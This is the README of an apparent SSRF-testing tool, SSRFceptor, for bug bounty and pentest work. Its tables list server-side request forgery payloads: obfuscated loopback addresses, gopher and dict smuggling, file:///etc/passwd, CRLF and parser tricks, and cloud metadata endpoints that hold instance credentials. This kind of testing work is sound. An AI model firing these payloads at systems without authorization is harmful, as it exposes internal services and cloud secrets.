Skip to content

Latest commit

 

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 

Repository files navigation

SSRFceptor Python License Made By

████   ███  ████    ███  ███  █   █   
█░░░█ █ ░░█ █░░░█    █░░█ ░░█  █ █ ░  
████░░█░ ░█░█░░░█░   █░░█░ ░█░  █ ░ ░ 
█░░░█ █░░ █░█░░ █░█  █░░█░░ █░░█ █ ░  
████░░ ███ ░████ ░░██ ░░ ███ ░█ ░ █   
 ░░░░ ░ ░░░ ░░░░░ ░ ░░ ░  ░░░ ░░ ░ ░  
  ░░░░   ░░░  ░░░░   ░░    ░░░  ░   ░  

Blind SSRF Detector · Webhook Callbacks · Out-of-Band Payloads

Detect server-side request forgery using OOB HTTP/DNS callbacks

Twitter GitHub Website


What is SSRFceptor?

SSRFceptor is a blind SSRF detection tool for bug bounty hunters and pentesters. It spins up a local webhook listener and generates 30+ out-of-band payloads designed to trigger server-side requests back to your callback server — proving SSRF even when the response isn't visible.

Features

  • Webhook callback server — local HTTP listener that captures all inbound SSRF requests
  • 30+ OOB payloads — IP obfuscation, protocol smuggling, parser tricks, DNS rebinding
  • Cloud metadata payloads — AWS, GCP, Azure, Alibaba, Kubernetes, Docker
  • Attack scenario guide — 10 common SSRF injection vectors with copy-paste payloads
  • Free webhook services — Integrates with Interactsh, webhook.site, requestbin, hookbin
  • Callback logging — timestamps, source IP, headers, request body captured
  • JSON export — full results for reports and CI/CD pipelines

Installation

git clone https://github.com/b0dj0x/ssrfceptor.git
cd ssrfceptor
pip install -r requirements.txt

Usage

Start webhook listener

python3 ssrfceptor.py serve                          # Listen on 127.0.0.1:9999
python3 ssrfceptor.py serve -p 8888 -b 0.0.0.0       # All interfaces, custom port

Generate OOB payloads

python3 ssrfceptor.py payloads                       # Payloads for localhost
python3 ssrfceptor.py payloads -H 1.2.3.4            # Payloads for your VPS
python3 ssrfceptor.py payloads -c                    # Include cloud metadata targets

Show attack scenarios

python3 ssrfceptor.py scenarios                      # 10 SSRF injection vectors
python3 ssrfceptor.py webhooks                       # Free webhook services

Payload Categories

IP Obfuscation

Payload Description
http://0x7f000001:9999/TOKEN Hex-encoded IP
http://2130706433:9999/TOKEN Decimal-encoded IP
http://[::1]:9999/TOKEN IPv6 loopback
http://[0000:0000:...:0001]:9999/TOKEN Full IPv6
http://1.0.0.127:9999/TOKEN Reversed IP octets
http://0127.0000.0000.0001:9999/TOKEN Zero-padded IP
http://①②⑦.⓪.⓪.①:9999/TOKEN Unicode IP digits

Protocol Smuggling

Payload Description
gopher://127.0.0.1:9999/_TOKEN Gopher protocol (Redis, SMTP, etc.)
dict://127.0.0.1:9999/TOKEN Dict protocol (LDAP, Redis INFO)
file:///etc/passwd Local file read

Parser Confusion

Payload Description
http://127.0.0.1%40:9999/TOKEN URL-encoded @
http://127.0.0.1\:9999/TOKEN Backslash trick
http://127.0.0.1%09:9999/TOKEN Tab injection
http://127.0.0.1%0d%0aHost:... CRLF injection
http://127.0.0.1%00:9999/TOKEN Null byte truncation
http://LoCaLhOsT:9999/TOKEN Case variation

HTML Injection

Payload Description
<meta http-equiv="refresh" content="0;url=..."> Meta refresh redirect
<img src="http://..." /> Image tag SSRF

Cloud Metadata Targets

Cloud Metadata Endpoint
AWS http://169.254.169.254/latest/meta-data/
GCP http://metadata.google.internal/computeMetadata/v1/
Azure http://169.254.169.254/metadata/instance
Alibaba http://100.100.100.200/latest/meta-data/
Kubernetes https://kubernetes.default.svc/
Docker http://unix:/var/run/docker.sock:/containers/json

Example Output

  Webhook server running on 127.0.0.1:9999
  Callback URL: http://127.0.0.1:9999/<token>

  ┌─── SSRF CALLBACK DETECTED ───
  │ Time:    2026-07-26 19:48:54 UTC
  │ Source:  127.0.0.1
  │ Method:  GET /test-token-12345
  │ Payload: Basic OOB
  │ Token:   test-token-12345
  │ Host:    127.0.0.1:9999
  │ UA:      curl/8.19.0
  └───────────────────────────────

Attack Scenarios

# Scenario Description
1 URL Import RSS readers, PDF generators, link previews
2 Webhook URL Slack/Discord/GitHub webhook fields
3 PDF Generation HTML-to-PDF services fetch resources
4 Image Proxy App proxies images through server
5 File Upload SVG/HTML with embedded URLs
6 SSO / OAuth redirect_uri manipulation
7 Email HTML Email templates with img tags
8 Webhook integrations Third-party webhook URL fields
9 API Gateway GraphQL/REST with URL fields
10 CI/CD Pipeline Build scripts with user-provided URLs

When to Use

  • Bug Bounty — Prove blind SSRF for higher severity/payouts
  • Pentesting — Audit web applications for SSRF vulnerabilities
  • Cloud security — Test for metadata endpoint exposure
  • CTF — Solve SSRF-related challenges
  • Code review — Validate SSRF mitigations work

Export

Results are auto-exported to JSON on Ctrl+C, or specify output:

python3 ssrfceptor.py serve --export results.json

Disclaimer

This tool is for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal.


Author

b0dj0x — Bug Bounty Hunter · OSINT Researcher · Red Team


Made with by b0dj0x

Releases

Packages

Contributors

Languages